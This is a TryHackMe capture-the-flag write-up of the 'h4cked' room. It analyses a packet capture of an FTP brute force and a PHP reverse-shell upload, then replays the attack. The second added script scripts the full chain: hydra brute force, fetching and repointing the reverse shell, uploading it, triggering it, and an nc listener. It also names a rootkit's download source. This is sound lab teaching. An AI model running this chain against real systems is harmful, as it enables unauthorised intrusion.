h4cked machine writeup | TryHackMe

Karim Reda
5 min read · Dec 9, 2021


Hello friends,

My name is Karim, and in this post I will walk you through how I pwned the h4cked machine on TryHackMe.

This machine is interesting because it combines network forensics with basic penetration-testing skills: first you reconstruct the original intrusion from a packet capture, then you replay the same attack yourself.

machine link: https://tryhackme.com/room/h4cked

Prerequisites:

1- Basic networking skills: using Wireshark and knowing common protocols such as FTP, HTTP and HTTPS.

2- Basic penetration-testing concepts: reverse shells, backdoors and privilege escalation.

Okay, let's start the walkthrough. The room consists of two tasks. In Task 1 we analyze the captured packets to understand how the attacker hacked the machine; in Task 2 we reproduce the attack ourselves.

Let's answer the Task 1 questions.

A pcap file is attached to the first task. Download it and open it in Wireshark.

Going through the packets, we notice the attacker connecting to the FTP service (port 21). Right-click any of those packets, then Follow -> TCP Stream.

We can see that the attacker entered the wrong password many times (each failed attempt gets a "530 Login incorrect" reply from the server), so he was brute-forcing the account. Let's find the attempt that worked.
FTP answers a correct login with "230 Login successful", so filter the capture on that reply, for example with the display filter ftp.response.code == 230 (or ftp contains "Login successful").

Once we have that packet, repeat the previous steps: right-click -> Follow -> TCP Stream.

Boom! We found the credentials the attacker used to log in to FTP.

Now we should think about what the attacker did after logging in to FTP.

Going deeper into the packets, we look for the attacker's activity in Wireshark's Info column.

The attacker uploaded a PHP file over FTP (a STOR request) into a directory served by the web server. Requesting that file from the web server executes it and gives him a reverse shell.

Now let's take a last look at the packets to see what harmful activity the attacker carried out on the system.

Here we see that the attacker succeeded in getting a reverse shell and ran some commands in it (following the reverse-shell TCP stream shows them in plain text).

Next he downloaded a tool from https://github.com/f0rb1dd3n/Reptile. A bit of googling shows that Reptile is a Linux kernel-module (LKM) rootkit, a type of backdoor: it hides the attacker's files and processes and gives him a persistent root shell. Installing it, however, already requires root privileges on the system.

Here we see that the attacker failed to escalate his privileges (and without root, a rootkit like Reptile cannot be loaded).
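To make the Task 1 analysis reproducible from the command line, here is an added example (my own script, not part of the original writeup or the room). The first part expresses the Wireshark questions as tshark filters and assumes tshark is installed and the capture is saved as capture.pcapng (the file name is assumed); the second part is an offline parser for a followed FTP control stream, run here against a constructed sample transcript whose user name, passwords and file name are made up for the demonstration.

```shell
#!/usr/bin/env sh
# Added example for this writeup, not the room's own material.
# Assumptions: tshark is installed and the capture is saved as capture.pcapng
# (file name assumed); the server uses standard FTP reply codes
# (530 = login failed, 230 = login successful, STOR = file upload).

# Part 1: the Task 1 questions as tshark display filters. Needs the real capture.
ftp_triage() {
    pcap="$1"
    echo "== failed logins (530 replies) =="
    tshark -r "$pcap" -Y 'ftp.response.code == 530' | wc -l
    echo "== successful login: which stream, and who talked to whom =="
    tshark -r "$pcap" -Y 'ftp.response.code == 230' -T fields -e tcp.stream -e ip.src -e ip.dst
    echo "== files uploaded over FTP =="
    tshark -r "$pcap" -Y 'ftp.request.command == "STOR"' -T fields -e ftp.request.arg
}

# Dump one stream as text (same as Wireshark's Follow -> TCP Stream).
# Use it on the FTP stream for the credentials and on the reverse-shell
# stream to read the commands the attacker typed (e.g. the wget of Reptile).
follow_stream() {
    tshark -r "$1" -q -z "follow,tcp,ascii,$2"
}

# Part 2: offline parser for a followed FTP control-channel stream on stdin.
# Remembers the last USER/PASS sent, counts 530 failures, records the pair
# that got a 230, and lists every STOR upload. Runs without tshark or a pcap.
ftp_stream_summary() {
    awk '
        { sub(/\r$/, "") }                 # strip CR from CRLF lines
        $1 == "USER" { user = $2 }
        $1 == "PASS" { pass = $2 }
        $1 == "530"  { failed++ }
        $1 == "230"  { creds = user ":" pass }
        $1 == "STOR" { uploads = uploads (uploads == "" ? "" : ",") $2 }
        END { printf "failed=%d creds=%s uploads=%s\n", failed, creds, uploads }
    '
}

# Constructed sample: a trimmed-down FTP control stream in the shape of the
# one in the capture (names and passwords are made up).
SAMPLE_STREAM='220 (vsFTPd 3.0.3)
USER jenny
331 Please specify the password.
PASS 123456
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS qwerty
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS s3cret
230 Login successful.
CWD /var/www/html
250 Directory successfully changed.
STOR shell.php
150 Ok to send data.
226 Transfer complete.
QUIT
221 Goodbye.'

printf '%s\n' "$SAMPLE_STREAM" | ftp_stream_summary
# prints: failed=2 creds=jenny:s3cret uploads=shell.php
```

On the real capture you would run ftp_triage capture.pcapng to get the counts and the stream number, then follow_stream capture.pcapng N | ftp_stream_summary for the credentials and the uploaded file name; the same follow_stream call on the reverse-shell stream shows the commands the attacker typed.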

Well done, you solved the first task! I'm excited to finish the second task with you, so let's continue with the same passion.

Now we want to reproduce this attack with our own methodology. Before we start, the challenge creator tells us that the attacker changed the password of the FTP user.

— First of all, we run a dictionary (brute-force) attack against FTP, using the username we recovered from the capture, to find the new password.

Once we have the new FTP credentials, let's log in.

We see the file the attacker uploaded to get his reverse shell. Download it, take a look at it, and edit the callback address to your own IP and listening port so that it connects back to you instead.

Upload the edited PHP file to the FTP server, start a listener on your chosen port in your terminal, and trigger the shell by browsing to http://{machine_ip}/{file_name}.

After visiting that URL, the shell connects back to our listener.

Now that we are in the system, let's try to escalate our privileges.

First I ran "sudo -l" to list the commands this user is allowed to run with sudo, but it was of no use.
However, I noticed that the shell runs as www-data, not as jenny, so I tried logging in as jenny with her credentials (the ones we found for FTP), and it worked. That gets us to the flag.
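The whole Task 2 procedure (brute force, fetch and patch the PHP reverse shell, upload it, trigger it) as one added script. This is my own example, not the writeup's or the room's code: the target and attacker addresses, the port, the wordlist path and the file name shell.php are placeholders, and the patch step assumes the reverse shell is written in the common pentestmonkey style with "$ip = '...';" and "$port = ...;" lines. Only the patch step runs offline; it is demonstrated on a constructed stand-in file.

```shell
#!/usr/bin/env sh
# Added example for this writeup, not the room's own material.
# Assumptions (placeholders, not values from the room):
#   TARGET   = the machine's IP, LHOST/LPORT = our VPN IP and listener port,
#   FTP_USER = jenny (the account seen in the capture),
#   WORDLIST = rockyou.txt, shell.php = the PHP reverse shell pulled from FTP,
#   written in the pentestmonkey style with "$ip = '...';" and "$port = ...;" lines.
TARGET="${TARGET:-10.10.10.10}"
LHOST="${LHOST:-10.8.0.2}"
LPORT="${LPORT:-4444}"
FTP_USER="${FTP_USER:-jenny}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Step 1: the attacker changed the FTP password, so recover it with a
# dictionary attack (needs hydra and the live target). -f stops at the first hit.
brute_force_ftp() {
    hydra -l "$FTP_USER" -P "$WORDLIST" -f "ftp://$TARGET"
}

# Step 2: fetch the attacker's shell.php from FTP ($1 = recovered password),
# then rewrite its callback address. patch_reverse_shell is plain sed, so it
# also runs offline; it prints the patched file on stdout.
fetch_shell() {
    curl -s --user "$FTP_USER:$1" "ftp://$TARGET/shell.php" -o shell.php
}
patch_reverse_shell() {   # $1 = file, $2 = new ip, $3 = new port
    sed -e "s/^\([$]ip *= *\)'[^']*';/\1'$2';/" \
        -e "s/^\([$]port *=\) *[0-9]*;/\1 $3;/" "$1"
}

# Step 3: upload the patched file back over FTP ($1 = recovered password) and
# trigger it over HTTP while a listener waits in a second terminal:
#     nc -lvnp "$LPORT"
upload_shell() {
    curl -s -T shell_patched.php --user "$FTP_USER:$1" "ftp://$TARGET/"
}
trigger_shell() {
    # -m 5: the request never completes while the shell is alive, so time out
    curl -s -m 5 "http://$TARGET/shell_patched.php" >/dev/null
}

# Offline demonstration of the patch step on a constructed stand-in for shell.php.
SAMPLE_PHP="$(mktemp)"
cat > "$SAMPLE_PHP" <<'EOF'
<?php
// constructed stand-in: only the two lines we need to change
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
patch_reverse_shell "$SAMPLE_PHP" "$LHOST" "$LPORT"
# prints the file with $ip = '10.8.0.2'; and $port = 4444;
rm -f "$SAMPLE_PHP"
```

Against the live machine the order is: brute_force_ftp, fetch_shell PASSWORD, patch_reverse_shell shell.php "$LHOST" "$LPORT" > shell_patched.php, upload_shell PASSWORD, start nc -lvnp "$LPORT" in another terminal, then trigger_shell. The shell that comes back runs as www-data (the web server's user), which is why the writeup then switches to jenny with the brute-forced password rather than relying on sudo.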

It was a long journey, but we learned a lot of new skills.

thank you
